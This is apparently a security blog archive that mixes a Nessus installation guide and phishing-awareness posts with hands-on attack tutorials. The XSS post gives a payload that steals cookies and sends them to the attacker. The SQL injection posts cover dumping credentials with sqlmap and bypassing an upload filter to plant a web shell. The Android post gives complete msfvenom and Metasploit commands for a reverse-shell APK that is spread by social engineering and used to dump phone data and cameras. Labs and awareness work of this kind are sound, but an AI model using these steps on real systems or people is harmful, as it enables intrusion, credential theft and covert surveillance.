How To Install Nessus Vulnerability Scanner

In our previous post we showed how to download and verify the hash of the Home edition of Nessus, and here we will show how to install, setup and run your first scan. This is a very basic setup to get you up and running quickly with the free version of Nessus. If you are going to be using in a live production environment, don’t use this guide.

If you have not read the initial post go here then come back.

You should be where we left off which is just after checking our hash and confirming against the checksum as below

Get used to running the “ls” cmd to check the directory you are in and that you have access to the correct files.

We “ls” to check as mentioned above then use “dpkg -i” which will de-package and then install Nessus.

While that runs and installs we need to go back to and get an activation code.

Fill in the details and wait for your email with the activation code.

Go back to your Terminal where the install should now have completed. Check the Window for errors and if there are none we are good to continue.

Run the following “/etc/init.d/nessusd start”

Nessus is now running, so open a browser on the same machine and go to https://localhost:8834 and you should get the login screen.

Create a Username and a Password to login  for the first time (don’t forget these!) and you will get the activation page.

Leave the scanner type, and enter your activation key which you will have received by email.

If correct you will see the next screen, now is the time to make a coffee as this stage may take some time as Nessus sets up.

Once completed you will see the “New Scan” screen.

Select New Scan as shown, then select “Basic Network Scan”. This will allow us to do a basic scan of our internal home network.

We will need to find out the IP of our network for the next step, the easiest way to do this is to use either “ifconfig” on a Linux box or “ipconfig” on a Windows box. Run this from a Terminal Window and make a note of your ip address. (This is a simple step so if unsure how to do it you really shouldn’t be installing Nessus to be honest!)

Name and description can be whatever you want, but the IP Address in the targets box needs to be the IP address you want to scan. In the example it shows “” which means that we are going to scan every address on our network. The scan an individual host you would use a single address, for example “”. Now save as shown below and you’ll go back to the main page.

To start your scan click the chevron, as outlined below, then wait for your scan to complete.

Once the scan completes, the real fun starts!

DDEAUTO Opens Webpage

We have already posted about DDEAUTO, but thought we’d show another one just as it’s slightly different.

If a document opens and you are greeted by a pop up of any kind, then I’d say 99 times out of a hundred, it’s going to be a malicious exploit and you should just close and delete the document immediately and run a full Anti-Virus scan with at least 3 different free scanners.

Then 2 weeks later re-run all the scans again.

The DDEAUTO Exploit in all Microsoft Office Documents

This is the new exploit which is everywhere at the moment.

It’s a little different to the typical Macro exploits which are normally used.

In general you will need to click on 2 pop ups to allow the exploit to run, however since writing this I have played around a bit more and managed to get it down to only one pop up.

The point here in this video however is to show that if you read what the pop up says, you should not be clicking on it in any circumstances.

It’s true that some documents are linked dynamically to keep all data in linked sheets up to date. However if you are using one of these you would normally know about it.

If you don’t normally use documents with linked data and you open one which asks you to allow linked data, don’t just click OK! If you know who sent it, ask them what it is, and if you don’t know where it came from you probably should even be opening the attachment in the first place!

Then after clicking yes to the first pop up, we receive a second one, this is generally where the exploit will run. Ours is very obviously named for the sake of this demonstration, but an attacker would be trying their best to disguise it.

We hope that by watching this video you will be a little bit more educated and perhaps won’t click on that pop up box if you receive one of these emails!

Enjoy the Video.

Excel Malicious Macro Attachment

Hello again.

It’s 2017 and we are still enabling Macros in documents we receive via email! (Come on people!)

Anyways, there are still people out there who don’t believe a macro can be used this way, so here is a quick video you can show them.

In this short clip a user receives an email from, but you can clearly see it actually came from a gmail address, and it contains an Excel invoice attachment.

In this example we have Excel set to not allow Macros to run automatically, but we are aware that a lot of people don’t use this setting (you nut-cases!).

Notice that nothing happens until the Macro is enabled!

Don’t enable a macro unless you are 100% sure of what it is.

The Excel sheet contains a simple macro which opens IE and goes to a website. This demonstrates how easy it is for an attacker to use a macro to either install malware or ransomware.  We have used this method in our demo as it is very quick and visual and seems to get the point across better than a more complicated example.

Fake URL in Email

IT’s 2017 and we are still clicking on links in emails!

This is a quick video to demonstrate how a link in an email displaying one address can take you somewhere completely different!

We’re going to follow this up with some videos showing malicious attachments.

Don’t trust emails!

XSS Cookie Steal

Here we demonstrate why you should be filtering any user input.

This shows how easy it is for an attacker to plant some malicious code on a site and steal the admin login credentials (Or another user), by using Cross-Site-Scripting. There is a great explanation on OWASP’s website.

First we test the text areas for correct input validation and when we find it is not being correctly checked we then look to exploit that flaw.

By enclosing the following in script tags “document.write(‘<img src=”’+document.cookie+’ “/>’);” we can send the stolen cookies to our PC and then reuse them on the site to gain access to the admin panel and from there we can add  malicious code, create new users or look to get root access on the server.

The site is on and our attacking machine is on

To demostrate this we are using the “XSS and MySQL File” VM from

SQL Injection to URL Redirect Part 2

In this video we start off by using “wget” to clone the site we are attacking so when users are redirected to our site they are less suspicious as any differences are subtle, and wont generally be noticed by normal users. Then we load the cloned pages on our webserver.

For the purpose of the demo we have left the IP address showing in the address bar so you can see the difference. The original site is on .105 and our clone is on .104 (Poisoning the host file or typo-squatting is a whole tutorial by itself).

Back to the hack. We have enough access that if we wanted to we could upload our own pages and replace the existing ones, but for the purpose of this we are going to change where the login URL points to so it sends users to our clone site rather then the correct login page.

We could obviously do this with every link on the site. We could also just upload some further malicious code to the server so that every visitor to the site will have their browser injected with malicious code.

SQL Injection to URL Redirect Part 1

Today we are going to show how an attacker can leverage SQL Injection to redirect users to their own site/webpage for whatever malicious activity they choose.

This will be in two parts. The first will show how using a tool called sqlmap we can carry out successful SLQ Injection, and very quickly dump usernames and passwords. The “php?id=1” part of the URL is injectable, and this is what sqlmap will exploit.

Then once we have access to the admin section, we upload our php shell, but the site has some basic filtering so we change the filename and extension from “b374k-2.8.php” to “b374k-2.8 (copy).jpg.phtml” which gets us past the filtering controls. It also shows why even in password protected areas of your site you still need rubust upload controls. It means if someone manages to access the area they will still have to work to be able to upload a shell. Always think security in depth. Always add layers.

This video ends with us logging into the uploaded webshell and accessing the www directory.

How To Create a Malicious App for Android

So, recently got interested in how secure Android apps are and how I could learn a bit more about them. The best way to learn? Create my own malicious App!

What else would we use other than Metasploit?

So we fire up the console like so…

service postgresql start


First we need to create the malicious .apk file, so open another Terminal Window and use the following making sure you enter your IP and port number after the “=” symbols.

msfvenom -p android/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=xxxx -o malicious.apk

You can name the app whatever you like using the “-o” switch. There are also other options you can specify but we will keep it simple for now.

In the first Window running Metasploit we now start a handler which will “listen” for when our app is installed and used which launches the connection attempt. We do this like so.

use exploit/multi/handler

Then we need to set IP, Port and Payload.  The port and IP need to be the same set in the previous steps when using msfvenom

set LHOST xx.xx.xx.xx

set LPORT xxxx

set PAYLOAD android/meterpreter/reverse_tcp

We can check what is required for an exploit at any time once it is loaded by running

show options

We have everything we need now configured so we can start the “listener”


Then we use social engineering to try and get someone to install and run it.

When they do you will the connection come back from the phone.

In this example we got 2 connections! We can list them with this command

sessions -i

We can then connect by using the same command but choosing which session we want to connect to.

sessions 1

And then quickly get some info to confirm the device.


Then we can quickly dump info from the phone imediately using the dump commands



You can also capture a screen shot, take a photo front either camera, or even stream live from either camera on the device. Scary huh?

If you have NO anti Virus on your Android, and you have disabled the “verify app” feature then this simple app will run without any issues.

If you have an Android phone, enable the app verifier, and get some anti virus to at least give yourself a fighting chance!

There will be a follow up to this post as there are tools we can use to make our malicious apps look better and be less likely to be blocked by anti virus. That’s it for now though.

Eternal Blue Scan and Exploit Demo

It’s everywhere at the moment. ms17_010 or Eternal Blue as it’s affectionately known. It’s another great example of why it’s so important to not only keep your Anti Virus solution up to date, but also to install the latest patches for your OS.  This exploit requires just 2 things. That the port is open and that the required patch is not installed. In this demonstration we are attacking Windows Server 2008, setup using the Metasploitable 3 script from this project

You can see that both the scanner and the exploit are built right into Metasploit and they are very easy to use. Patch your machines, Even if you think you can’t set up a test environment and try. Make good backups, and check that they work. Enjoy the video.

If you wanna setup Metasploitable 3 you need to do a bit of legwork, it doesn’t just work out of the box like it’s predecessor, and you need to install some prerequisites. The guides I used are here and here